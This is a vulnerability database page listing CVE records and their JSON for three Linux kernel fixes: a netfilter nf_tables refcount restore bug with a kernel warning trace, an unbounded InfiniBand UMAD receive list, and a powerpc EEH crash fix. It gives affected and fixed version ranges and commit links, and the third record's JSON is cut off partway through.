In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: restore set elements when delete set fails From abort path, nft_mapelem_activate() needs to restore refcounters to the original state. Currently, it uses the set->ops->walk() to iterate over these set elements. The existing set iterator skips inactive elements in the next generation, this does not work from the abort path to restore the original state since it has to skip active elements instead (not inactive ones). This patch moves the check for inactive elements to the set iterator callback, then it reverses the logic for the .activate case which needs to skip active elements. Toggle next generation bit for elements when delete set command is invoked and call nft_clear() from .activate (abort) path to restore the next generation bit. The splat below shows an object in mappings memleak: [43929.457523] ------------[ cut here ]------------ [43929.457532] WARNING: CPU: 0 PID: 1139 at include/net/netfilter/nf_tables.h:1237 nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [...] [43929.458014] RIP: 0010:nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [43929.458076] Code: 83 f8 01 77 ab 49 8d 7c 24 08 e8 37 5e d0 de 49 8b 6c 24 08 48 8d 7d 50 e8 e9 5c d0 de 8b 45 50 8d 50 ff 89 55 50 85 c0 75 86 <0f> 0b eb 82 0f 0b eb b3 0f 1f 40 00 90 90 90 90 90 90 90 90 90 90 [43929.458081] RSP: 0018:ffff888140f9f4b0 EFLAGS: 00010246 [43929.458086] RAX: 0000000000000000 RBX: ffff8881434f5288 RCX: dffffc0000000000 [43929.458090] RDX: 00000000ffffffff RSI: ffffffffa26d28a7 RDI: ffff88810ecc9550 [43929.458093] RBP: ffff88810ecc9500 R08: 0000000000000001 R09: ffffed10281f3e8f [43929.458096] R10: 0000000000000003 R11: ffff0000ffff0000 R12: ffff8881434f52a0 [43929.458100] R13: ffff888140f9f5f4 R14: ffff888151c7a800 R15: 0000000000000002 [43929.458103] FS: 00007f0c687c4740(0000) GS:ffff888390800000(0000) knlGS:0000000000000000 [43929.458107] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [43929.458111] CR2: 00007f58dbe5b008 CR3: 0000000123602005 CR4: 00000000001706f0 [43929.458114] Call Trace: [43929.458118] <TASK> [43929.458121] ? __warn+0x9f/0x1a0 [43929.458127] ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [43929.458188] ? report_bug+0x1b1/0x1e0 [43929.458196] ? handle_bug+0x3c/0x70 [43929.458200] ? exc_invalid_op+0x17/0x40 [43929.458211] ? nft_setelem_data_deactivate+0xd7/0xf0 [nf_tables] [43929.458271] ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [43929.458332] nft_mapelem_deactivate+0x24/0x30 [nf_tables] [43929.458392] nft_rhash_walk+0xdd/0x180 [nf_tables] [43929.458453] ? __pfx_nft_rhash_walk+0x10/0x10 [nf_tables] [43929.458512] ? rb_insert_color+0x2e/0x280 [43929.458520] nft_map_deactivate+0xdc/0x1e0 [nf_tables] [43929.458582] ? __pfx_nft_map_deactivate+0x10/0x10 [nf_tables] [43929.458642] ? __pfx_nft_mapelem_deactivate+0x10/0x10 [nf_tables] [43929.458701] ? __rcu_read_unlock+0x46/0x70 [43929.458709] nft_delset+0xff/0x110 [nf_tables] [43929.458769] nft_flush_table+0x16f/0x460 [nf_tables] [43929.458830] nf_tables_deltable+0x501/0x580 [nf_tables]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/86658fc7414d4b9e2…
	https://git.kernel.org/stable/c/e79b47a8615d42c68…

Impacted products

Vendor

Product

Version

Linux

Affected: 628bd3e49cba1c066228e23d71a852c23e26da73 , < 86658fc7414d4b9e25c2699d751034537503d637 (git)
Affected: 628bd3e49cba1c066228e23d71a852c23e26da73 , < e79b47a8615d42c68aaeb68971593333667382ed (git)
Affected: bc9f791d2593f17e39f87c6e2b3a36549a3705b1 (git)
Affected: 3c7ec098e3b588434a8b07ea9b5b36f04cef1f50 (git)
Affected: a136b7942ad2a50de708f76ea299ccb45ac7a7f9 (git)
Affected: 25aa2ad37c2162be1c0bc4fe6397f7e4c13f00f8 (git)
Affected: d60be2da67d172aecf866302c91ea11533eca4d9 (git)
Affected: dc7cdf8cbcbf8b13de1df93f356ec04cdeef5c41 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27012",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-14T18:56:10.473492Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-14T18:56:19.427Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:03.442Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/86658fc7414d4b9e25c2699d751034537503d637"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e79b47a8615d42c68aaeb68971593333667382ed"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_bitmap.c",
            "net/netfilter/nft_set_hash.c",
            "net/netfilter/nft_set_pipapo.c",
            "net/netfilter/nft_set_rbtree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "86658fc7414d4b9e25c2699d751034537503d637",
              "status": "affected",
              "version": "628bd3e49cba1c066228e23d71a852c23e26da73",
              "versionType": "git"
            },
            {
              "lessThan": "e79b47a8615d42c68aaeb68971593333667382ed",
              "status": "affected",
              "version": "628bd3e49cba1c066228e23d71a852c23e26da73",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "bc9f791d2593f17e39f87c6e2b3a36549a3705b1",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "3c7ec098e3b588434a8b07ea9b5b36f04cef1f50",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a136b7942ad2a50de708f76ea299ccb45ac7a7f9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "25aa2ad37c2162be1c0bc4fe6397f7e4c13f00f8",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "d60be2da67d172aecf866302c91ea11533eca4d9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "dc7cdf8cbcbf8b13de1df93f356ec04cdeef5c41",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_bitmap.c",
            "net/netfilter/nft_set_hash.c",
            "net/netfilter/nft_set_pipapo.c",
            "net/netfilter/nft_set_rbtree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.19.316",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.262",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.10.188",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.15.121",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.1.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: restore set elements when delete set fails\n\nFrom abort path, nft_mapelem_activate() needs to restore refcounters to\nthe original state. Currently, it uses the set-\u003eops-\u003ewalk() to iterate\nover these set elements. The existing set iterator skips inactive\nelements in the next generation, this does not work from the abort path\nto restore the original state since it has to skip active elements\ninstead (not inactive ones).\n\nThis patch moves the check for inactive elements to the set iterator\ncallback, then it reverses the logic for the .activate case which\nneeds to skip active elements.\n\nToggle next generation bit for elements when delete set command is\ninvoked and call nft_clear() from .activate (abort) path to restore the\nnext generation bit.\n\nThe splat below shows an object in mappings memleak:\n\n[43929.457523] ------------[ cut here ]------------\n[43929.457532] WARNING: CPU: 0 PID: 1139 at include/net/netfilter/nf_tables.h:1237 nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[...]\n[43929.458014] RIP: 0010:nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[43929.458076] Code: 83 f8 01 77 ab 49 8d 7c 24 08 e8 37 5e d0 de 49 8b 6c 24 08 48 8d 7d 50 e8 e9 5c d0 de 8b 45 50 8d 50 ff 89 55 50 85 c0 75 86 \u003c0f\u003e 0b eb 82 0f 0b eb b3 0f 1f 40 00 90 90 90 90 90 90 90 90 90 90\n[43929.458081] RSP: 0018:ffff888140f9f4b0 EFLAGS: 00010246\n[43929.458086] RAX: 0000000000000000 RBX: ffff8881434f5288 RCX: dffffc0000000000\n[43929.458090] RDX: 00000000ffffffff RSI: ffffffffa26d28a7 RDI: ffff88810ecc9550\n[43929.458093] RBP: ffff88810ecc9500 R08: 0000000000000001 R09: ffffed10281f3e8f\n[43929.458096] R10: 0000000000000003 R11: ffff0000ffff0000 R12: ffff8881434f52a0\n[43929.458100] R13: ffff888140f9f5f4 R14: ffff888151c7a800 R15: 0000000000000002\n[43929.458103] FS:  00007f0c687c4740(0000) GS:ffff888390800000(0000) knlGS:0000000000000000\n[43929.458107] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[43929.458111] CR2: 00007f58dbe5b008 CR3: 0000000123602005 CR4: 00000000001706f0\n[43929.458114] Call Trace:\n[43929.458118]  \u003cTASK\u003e\n[43929.458121]  ? __warn+0x9f/0x1a0\n[43929.458127]  ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[43929.458188]  ? report_bug+0x1b1/0x1e0\n[43929.458196]  ? handle_bug+0x3c/0x70\n[43929.458200]  ? exc_invalid_op+0x17/0x40\n[43929.458211]  ? nft_setelem_data_deactivate+0xd7/0xf0 [nf_tables]\n[43929.458271]  ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[43929.458332]  nft_mapelem_deactivate+0x24/0x30 [nf_tables]\n[43929.458392]  nft_rhash_walk+0xdd/0x180 [nf_tables]\n[43929.458453]  ? __pfx_nft_rhash_walk+0x10/0x10 [nf_tables]\n[43929.458512]  ? rb_insert_color+0x2e/0x280\n[43929.458520]  nft_map_deactivate+0xdc/0x1e0 [nf_tables]\n[43929.458582]  ? __pfx_nft_map_deactivate+0x10/0x10 [nf_tables]\n[43929.458642]  ? __pfx_nft_mapelem_deactivate+0x10/0x10 [nf_tables]\n[43929.458701]  ? __rcu_read_unlock+0x46/0x70\n[43929.458709]  nft_delset+0xff/0x110 [nf_tables]\n[43929.458769]  nft_flush_table+0x16f/0x460 [nf_tables]\n[43929.458830]  nf_tables_deltable+0x501/0x580 [nf_tables]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:21.766Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/86658fc7414d4b9e25c2699d751034537503d637"
        },
        {
          "url": "https://git.kernel.org/stable/c/e79b47a8615d42c68aaeb68971593333667382ed"
        }
      ],
      "title": "netfilter: nf_tables: restore set elements when delete set fails",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27012",
    "datePublished": "2024-05-01T05:29:37.765Z",
    "dateReserved": "2024-02-19T14:20:24.208Z",
    "dateUpdated": "2025-11-04T17:17:03.442Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42145 (GCVE-0-2024-42145)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2026-01-05 10:52

Title

IB/core: Implement a limit on UMAD receive List

Summary

In the Linux kernel, the following vulnerability has been resolved: IB/core: Implement a limit on UMAD receive List The existing behavior of ib_umad, which maintains received MAD packets in an unbounded list, poses a risk of uncontrolled growth. As user-space applications extract packets from this list, the rate of extraction may not match the rate of incoming packets, leading to potential list overflow. To address this, we introduce a limit to the size of the list. After considering typical scenarios, such as OpenSM processing, which can handle approximately 100k packets per second, and the 1-second retry timeout for most packets, we set the list size limit to 200k. Packets received beyond this limit are dropped, assuming they are likely timed out by the time they are handled by user-space. Notably, packets queued on the receive list due to reasons like timed-out sends are preserved even when the list is full.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1288cf1cceb0e6df2…
	https://git.kernel.org/stable/c/b4913702419d064ec…
	https://git.kernel.org/stable/c/62349fbf86b5e13b0…
	https://git.kernel.org/stable/c/d73cb8862e4d6760c…
	https://git.kernel.org/stable/c/63d202d948bb6d3a2…
	https://git.kernel.org/stable/c/b8c5f635997f49c62…
	https://git.kernel.org/stable/c/a6627fba793cc75b7…
	https://git.kernel.org/stable/c/ca0b44e20a6f30322…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 1288cf1cceb0e6df276e182f5412370fb4169bcb (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < b4913702419d064ec4c4bbf7270643c95cc89a1b (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 62349fbf86b5e13b02721bdadf98c29afd1e7b5f (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d73cb8862e4d6760ccc94d3b57b9ef6271400607 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 63d202d948bb6d3a28cd8e8b96b160fa53e18baa (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < b8c5f635997f49c625178d1a0cb32a80ed33abe6 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < a6627fba793cc75b7365d9504a0095fb2902dda4 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < ca0b44e20a6f3032224599f02e7c8fb49525c894 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:11.211Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1288cf1cceb0e6df276e182f5412370fb4169bcb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b4913702419d064ec4c4bbf7270643c95cc89a1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/62349fbf86b5e13b02721bdadf98c29afd1e7b5f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d73cb8862e4d6760ccc94d3b57b9ef6271400607"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/63d202d948bb6d3a28cd8e8b96b160fa53e18baa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b8c5f635997f49c625178d1a0cb32a80ed33abe6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a6627fba793cc75b7365d9504a0095fb2902dda4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca0b44e20a6f3032224599f02e7c8fb49525c894"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42145",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:44.209486Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:35.248Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/core/user_mad.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1288cf1cceb0e6df276e182f5412370fb4169bcb",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "b4913702419d064ec4c4bbf7270643c95cc89a1b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "62349fbf86b5e13b02721bdadf98c29afd1e7b5f",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "d73cb8862e4d6760ccc94d3b57b9ef6271400607",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "63d202d948bb6d3a28cd8e8b96b160fa53e18baa",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "b8c5f635997f49c625178d1a0cb32a80ed33abe6",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "a6627fba793cc75b7365d9504a0095fb2902dda4",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "ca0b44e20a6f3032224599f02e7c8fb49525c894",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/core/user_mad.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/core: Implement a limit on UMAD receive List\n\nThe existing behavior of ib_umad, which maintains received MAD\npackets in an unbounded list, poses a risk of uncontrolled growth.\nAs user-space applications extract packets from this list, the rate\nof extraction may not match the rate of incoming packets, leading\nto potential list overflow.\n\nTo address this, we introduce a limit to the size of the list. After\nconsidering typical scenarios, such as OpenSM processing, which can\nhandle approximately 100k packets per second, and the 1-second retry\ntimeout for most packets, we set the list size limit to 200k. Packets\nreceived beyond this limit are dropped, assuming they are likely timed\nout by the time they are handled by user-space.\n\nNotably, packets queued on the receive list due to reasons like\ntimed-out sends are preserved even when the list is full."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:01.255Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1288cf1cceb0e6df276e182f5412370fb4169bcb"
        },
        {
          "url": "https://git.kernel.org/stable/c/b4913702419d064ec4c4bbf7270643c95cc89a1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/62349fbf86b5e13b02721bdadf98c29afd1e7b5f"
        },
        {
          "url": "https://git.kernel.org/stable/c/d73cb8862e4d6760ccc94d3b57b9ef6271400607"
        },
        {
          "url": "https://git.kernel.org/stable/c/63d202d948bb6d3a28cd8e8b96b160fa53e18baa"
        },
        {
          "url": "https://git.kernel.org/stable/c/b8c5f635997f49c625178d1a0cb32a80ed33abe6"
        },
        {
          "url": "https://git.kernel.org/stable/c/a6627fba793cc75b7365d9504a0095fb2902dda4"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca0b44e20a6f3032224599f02e7c8fb49525c894"
        }
      ],
      "title": "IB/core: Implement a limit on UMAD receive List",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42145",
    "datePublished": "2024-07-30T07:46:38.650Z",
    "dateReserved": "2024-07-29T15:50:41.190Z",
    "dateUpdated": "2026-01-05T10:52:01.255Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41064 (GCVE-0-2024-41064)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:57 – Updated: 2025-11-03 22:00

Title

powerpc/eeh: avoid possible crash when edev->pdev changes

Summary

In the Linux kernel, the following vulnerability has been resolved: powerpc/eeh: avoid possible crash when edev->pdev changes If a PCI device is removed during eeh_pe_report_edev(), edev->pdev will change and can cause a crash, hold the PCI rescan/remove lock while taking a copy of edev->pdev->bus.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8836e1bf5838ac6c0…
	https://git.kernel.org/stable/c/033c51dfdbb6b79ab…
	https://git.kernel.org/stable/c/4fad7fef847b60284…
	https://git.kernel.org/stable/c/4bc246d2d60d07131…
	https://git.kernel.org/stable/c/f23c3d1ca9c4b2d62…
	https://git.kernel.org/stable/c/428d940a8b6b3350b…
	https://git.kernel.org/stable/c/a1216e62d039bf63a…

Impacted products

Vendor

Product

Version

Linux

Affected: 9b3c76f08122f5efdbe4992a64b8478cc92dd983 , < 8836e1bf5838ac6c08760e0a2dd7cf6410aa7ff3 (git)
Affected: 9b3c76f08122f5efdbe4992a64b8478cc92dd983 , < 033c51dfdbb6b79ab43fb3587276fa82d0a329e1 (git)
Affected: 9b3c76f08122f5efdbe4992a64b8478cc92dd983 , < 4fad7fef847b6028475dd7b4c14fcb82b3e51274 (git)
Affected: 9b3c76f08122f5efdbe4992a64b8478cc92dd983 , < 4bc246d2d60d071314842fa448faa4ed39082aff (git)
Affected: 9b3c76f08122f5efdbe4992a64b8478cc92dd983 , < f23c3d1ca9c4b2d626242a4e7e1ec1770447f7b5 (git)
Affected: 9b3c76f08122f5efdbe4992a64b8478cc92dd983 , < 428d940a8b6b3350b282c14d3f63350bde65c48b (git)
Affected: 9b3c76f08122f5efdbe4992a64b8478cc92dd983 , < a1216e62d039bf63a539bbe718536ec789a853dd (git)

Linux

Affected: 3.7
Unaffected: 0 , < 3.7 (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.101 , ≤ 6.1.* (semver)
Unaffected: 6.6.42 , ≤ 6.6.* (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:13.274Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8836e1bf5838ac6c08760e0a2dd7cf6410aa7ff3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/033c51dfdbb6b79ab43fb3587276fa82d0a329e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
